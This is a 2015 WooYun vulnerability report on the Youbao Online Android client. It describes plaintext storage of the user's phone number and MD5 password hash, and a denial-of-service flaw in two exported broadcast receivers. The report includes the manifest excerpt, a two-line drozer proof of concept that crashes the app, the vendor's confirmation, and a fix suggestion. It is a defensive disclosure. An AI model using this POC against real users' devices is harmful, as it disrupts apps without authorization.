当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121107

漏洞标题:友宝在线Android客户端敏感信息泄露及拒绝服务漏洞

相关厂商:友宝在线

漏洞作者: 路人甲

提交时间:2015-06-26 11:25

修复时间:2015-09-24 12:54

公开时间:2015-09-24 12:54

漏洞类型:用户敏感数据泄漏

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-26: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向第三方安全合作伙伴开放
2015-08-20: 细节向核心白帽子及相关领域专家公开
2015-08-30: 细节向普通白帽子公开
2015-09-09: 细节向实习白帽子公开
2015-09-24: 细节向公众公开

简要描述:

RT

详细说明:

#### 客户端信息,v5.6.0
#### 客户端配置文件中,明文保存用户手机号,和密码的md5,众所周知,md5是可以用彩虹表的方式破解的,基本约等于明文

1.JPG


#### AndroidManifest文件中配置导出的BroadcastReceiver组件com.ub.main.receiver.UboxReceiver和com.ub.main.receiver.BaiduPushReceiver,接收到空的广播消息后,会导致客户端崩溃退出

<receiver android:name="com.ub.main.receiver.UboxReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.PACKAGE_REPLACED"/>
<data android:scheme="package"/>
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.ACTION_PACKAGE_ADDED"/>
</intent-filter>
</receiver>
<receiver android:name="com.ub.main.receiver.BaiduPushReceiver">
<intent-filter>
<action android:name="com.baidu.android.pushservice.action.MESSAGE"/>
<action android:name="com.baidu.android.pushservice.action.RECEIVE"/>
<action android:name="com.baidu.android.pushservice.action.notification.CLICK"/>
</intent-filter>
</receiver>


2.JPG


Crash日志

3.JPG


4.JPG


#### POC

dz> run app.broadcast.send --component com.ub.main com.ub.main.receiver.UboxReceiver
dz> run app.broadcast.send --component com.ub.main com.ub.main.receiver.BaiduPushReceiver

漏洞证明:

修复方案:

组件应正确处理异常的广播消息

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-26 12:53

厂商回复:

感谢对友宝的关注,我们会尽快解决。

最新状态:

暂无